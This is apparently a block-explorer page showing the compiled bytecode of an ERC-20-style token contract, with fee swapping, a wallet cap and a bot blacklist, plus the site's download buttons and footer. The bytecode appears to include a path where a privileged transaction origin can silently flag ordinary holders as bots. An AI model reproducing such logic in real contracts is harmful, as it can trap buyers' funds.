956565b005b3480156104a5575f5ffd5b506104ae610ab7565b6040516104bb91906122c0565b60405180910390f35b3480156104cf575f5ffd5b506104d8610ade565b6040516104e5919061206f565b60405180910390f35b3480156104f9575f5ffd5b50610514600480360381019061050f9190612120565b610b6e565b6040516105219190612178565b60405180910390f35b348015610535575f5ffd5b50610550600480360381019061054b9190612120565b610c36565b60405161055d9190612178565b60405180910390f35b348015610571575f5ffd5b5061058c60048036038101906105879190612304565b610c56565b6040516105999190612214565b60405180910390f35b3480156105ad575f5ffd5b506105c860048036038101906105c39190612342565b610cd8565b005b3480156105d5575f5ffd5b506105f060048036038101906105eb91906122d9565b610d65565b005b6060600a80546106019061239a565b80601f016020809104026020016040519081016040528092919081815260200182805461062d9061239a565b80156106785780601f1061064f57610100808354040283529160200191610678565b820191905f5260205f20905b81548152906001019060200180831161065b57829003601f168201915b5050505050905090565b5f61069561068e610de7565b8484610dee565b6001905092915050565b601960169054906101000a900460ff1681565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f600d54905090565b601960149054906101000a900460ff1681565b5f6106ff848484610f7c565b8094508195508296505050506107c884610717610de7565b6107c385604051806060016040528060288152602001612ba06028913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61077a610de7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546118079092919063ffffffff16565b610dee565b600190509392505050565b5f600c5f9054906101000a900460ff16905090565b5f61088c6107f4610de7565b846108878560025f610804610de7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461185b90919063ffffffff16565b610dee565b6001905092915050565b60115481565b60195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601960159054906101000a900460ff1681565b60125481565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610928611870565b6109315f6118ee565b565b60165481565b6003602052805f5260405f205f915054906101000a900460ff1681565b61095e611870565b6109aa3060185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff610dee565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71947306109f2306108da565b5f5f6109fc610ab7565b426040518863ffffffff1660e01b8152600401610a1e96959493929190612403565b60606040518083038185885af1158015610a3a573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610a5f9190612476565b5050506001601960156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1596001604051610aad9190612178565b60405180910390a1565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600b8054610aed9061239a565b80601f0160208091040260200160405190810160405280929190818152602001828054610b199061239a565b8015610b645780601f10610b3b57610100808354040283529160200191610b64565b820191905f5260205f20905b815481529060010190602001808311610b4757829003601f168201915b5050505050905090565b5f610c2c610b7a610de7565b84610c2785604051806060016040528060258152602001612bc86025913960025f610ba3610de7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546118079092919063ffffffff16565b610dee565b6001905092915050565b5f610c49610c42610de7565b8484610f7c565b5050506001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ce0611870565b601960149054906101000a900460ff1615610d30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2790612510565b60405180910390fd5b5f610d3a306108da565b90505f60648383610d4b919061255b565b610d5591906125c9565b9050610d60816119af565b505050565b610d6d611870565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd290612669565b60405180910390fd5b610de4816118ee565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015610e5657505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b610e95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8c906126d1565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f6f9190612214565b60405180910390a3505050565b5f5f5f610f87610ab7565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415801561100f575060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b801561104757503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156110a0575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156110f9575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156111385750611108610ab7565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b1561119b575f611147866108da565b9050601654858261115891906126ef565b1115611199576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611190906127b8565b60405180910390fd5b505b60045f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611225576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121c90612820565b60405180910390fd5b60035f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156112c8575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b8015611301575061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b801561132257506103e884611315886108da565b61131f919061283e565b11155b1561138757600160045f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508585925092506117fe565b5f73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16141580156113ef57505f73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b61142e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611425906128bb565b60405180910390fd5b5f8411611470576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146790612949565b60405180910390fd5b600f60019054906101000a900460ff1660ff16600f5f9054906101000a900460ff1660ff16101580156114b05750601960149054906101000a900460ff16155b8015611509575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b80156115215750601960159054906101000a900460ff165b15611560575f600f5f6101000a81548160ff021916908360ff1602179055505f61154a306108da565b90505f81111561155e5761155d816119af565b5b505b5f6001905060035f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff166115b7578491505b60035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611652575060035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b8061171b5750601960169054906101000a900460ff1680156116c1575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614155b801561171a575060195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b5b15611728575f90506117ea565b60195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff160361178a576011546010819055506117e9565b60195f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16036117e8576012546010819055505b5b5b6117f687878784611a20565b868693509350505b93509350939050565b5f83831115829061184e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611845919061206f565b60405180910390fd5b5082840390509392505050565b5f818361186891906126ef565b905092915050565b611878610de7565b73ffffffffffffffffffffffffffffffffffffffff16611896610ab7565b73ffffffffffffffffffffffffffffffffffffffff16146118ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e3906129b1565b60405180910390fd5b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6001601960146101000a81548160ff0219169083151502179055506119d381611a89565b5f479050611a0260055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1682611cbf565b505f601960146101000a81548160ff02191690831515021790555050565b80611a3257611a2d611d07565b611a6a565b600f5f81819054906101000a900460ff1680929190611a50906129cf565b91906101000a81548160ff021916908360ff160217905550505b611a75848484611d5d565b80611a8357611a82611f8b565b5b50505050565b5f600267ffffffffffffffff811115611aa557611aa46129f7565b5b604051908082528060200260200182016040528015611ad35781602001602082028036833780820191505090505b50905030815f81518110611aea57611ae9612a24565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611b8e573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611bb29190612a65565b81600181518110611bc657611bc5612a24565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611c2c3060185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610dee565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401611c8e959493929190612b47565b5f604051808303815f87803b158015611ca5575f5ffd5b505af1158015611cb7573d5f5f3e3d5ffd5b505050505050565b8173ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015611d02573d5f5f3e3d5ffd5b505050565b5f601054148015611d1957505f601154145b8015611d2657505f601254145b611d5b576011546014819055506012546015819055506010546013819055505f6011819055505f6012819055505f6010819055505b565b5f5f611d6883611fa8565b91509150611dbc8360015f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611fea90919063ffffffff16565b60015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611e4d8260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461185b90919063ffffffff16565b60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611ede8160015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461185b90919063ffffffff16565b60015f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611f7c9190612214565b60405180910390a35050505050565b601354601081905550601454601181905550601554601281905550565b5f5f5f606460105485611fbb919061255b565b611fc591906125c9565b90505f611fdb8286611fea90919063ffffffff16565b90508082935093505050915091565b5f8183611ff7919061283e565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61204182611fff565b61204b8185612009565b935061205b818560208601612019565b61206481612027565b840191505092915050565b5f6020820190508181035f8301526120878184612037565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6120bc82612093565b9050919050565b6120cc816120b2565b81146120d6575f5ffd5b50565b5f813590506120e7816120c3565b92915050565b5f819050919050565b6120ff816120ed565b8114612109575f5ffd5b50565b5f8135905061211a816120f6565b92915050565b5f5f604083850312156121365761213561208f565b5b5f612143858286016120d9565b92505060206121548582860161210c565b9150509250929050565b5f8115159050919050565b6121728161215e565b82525050565b5f60208201905061218b5f830184612169565b92915050565b5f819050919050565b5f6121b46121af6121aa84612093565b612191565b612093565b9050919050565b5f6121c58261219a565b9050919050565b5f6121d6826121bb565b9050919050565b6121e6816121cc565b82525050565b5f6020820190506121ff5f8301846121dd565b92915050565b61220e816120ed565b82525050565b5f6020820190506122275f830184612205565b92915050565b5f5f5f606084860312156122445761224361208f565b5b5f612251868287016120d9565b9350506020612262868287016120d9565b92505060406122738682870161210c565b9150509250925092565b5f60ff82169050919050565b6122928161227d565b82525050565b5f6020820190506122ab5f830184612289565b92915050565b6122ba816120b2565b82525050565b5f6020820190506122d35f8301846122b1565b92915050565b5f602082840312156122ee576122ed61208f565b5b5f6122fb848285016120d9565b91505092915050565b5f5f6040838503121561231a5761231961208f565b5b5f612327858286016120d9565b9250506020612338858286016120d9565b9150509250929050565b5f602082840312156123575761235661208f565b5b5f6123648482850161210c565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806123b157607f821691505b6020821081036123c4576123c361236d565b5b50919050565b5f819050919050565b5f6123ed6123e86123e3846123ca565b612191565b6120ed565b9050919050565b6123fd816123d3565b82525050565b5f60c0820190506124165f8301896122b1565b6124236020830188612205565b61243060408301876123f4565b61243d60608301866123f4565b61244a60808301856122b1565b61245760a0830184612205565b979650505050505050565b5f81519050612470816120f6565b92915050565b5f5f5f6060848603121561248d5761248c61208f565b5b5f61249a86828701612462565b93505060206124ab86828701612462565b92505060406124bc86828701612462565b9150509250925092565b7f43757272656e746c792070726f63657373696e672c20747279206c617465722e5f82015250565b5f6124fa602083612009565b9150612505826124c6565b602082019050919050565b5f6020820190508181035f830152612527816124ee565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f612565826120ed565b9150612570836120ed565b925082820261257e816120ed565b915082820484148315176125955761259461252e565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6125d3826120ed565b91506125de836120ed565b9250826125ee576125ed61259c565b5b828204905092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612653602683612009565b915061265e826125f9565b604082019050919050565b5f6020820190508181035f83015261268081612647565b9050919050565b7f4552523a207a65726f20616464726573730000000000000000000000000000005f82015250565b5f6126bb601183612009565b91506126c682612687565b602082019050919050565b5f6020820190508181035f8301526126e8816126af565b9050919050565b5f6126f9826120ed565b9150612704836120ed565b925082820190508082111561271c5761271b61252e565b5b92915050565b7f596f752061726520747279696e6720746f2062757920746f6f206d616e7920745f8201527f6f6b656e732e20596f752068617665207265616368656420746865206c696d6960208201527f7420666f72206f6e652077616c6c65742e000000000000000000000000000000604082015250565b5f6127a2605183612009565b91506127ad82612722565b606082019050919050565b5f6020820190508181035f8301526127cf81612796565b9050919050565b7f426f74206973206e6f7420616c6c6f77656400000000000000000000000000005f82015250565b5f61280a601283612009565b9150612815826127d6565b602082019050919050565b5f6020820190508181035f830152612837816127fe565b9050919050565b5f612848826120ed565b9150612853836120ed565b925082820390508181111561286b5761286a61252e565b5b92915050565b7f4552523a205573696e67203020616464726573732100000000000000000000005f82015250565b5f6128a5601583612009565b91506128b082612871565b602082019050919050565b5f6020820190508181035f8301526128d281612899565b9050919050565b7f546f6b656e2076616c7565206d75737420626520686967686572207468616e205f8201527f7a65726f2e000000000000000000000000000000000000000000000000000000602082015250565b5f612933602583612009565b915061293e826128d9565b604082019050919050565b5f6020820190508181035f83015261296081612927565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61299b602083612009565b91506129a682612967565b602082019050919050565b5f6020820190508181035f8301526129c88161298f565b9050919050565b5f6129d98261227d565b915060ff82036129ec576129eb61252e565b5b600182019050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050612a5f816120c3565b92915050565b5f60208284031215612a7a57612a7961208f565b5b5f612a8784828501612a51565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b612ac2816120b2565b82525050565b5f612ad38383612ab9565b60208301905092915050565b5f602082019050919050565b5f612af582612a90565b612aff8185612a9a565b9350612b0a83612aaa565b805f5b83811015612b3a578151612b218882612ac8565b9750612b2c83612adf565b925050600181019050612b0d565b5085935050505092915050565b5f60a082019050612b5a5f830188612205565b612b6760208301876123f4565b8181036040830152612b798186612aeb565b9050612b8860608301856122b1565b612b956080830184612205565b969550505050505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212205c5c3a746e617d1f0e34843a48fd89029a975751375033eb59b5c0498f02ea8864736f6c634300081c0033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.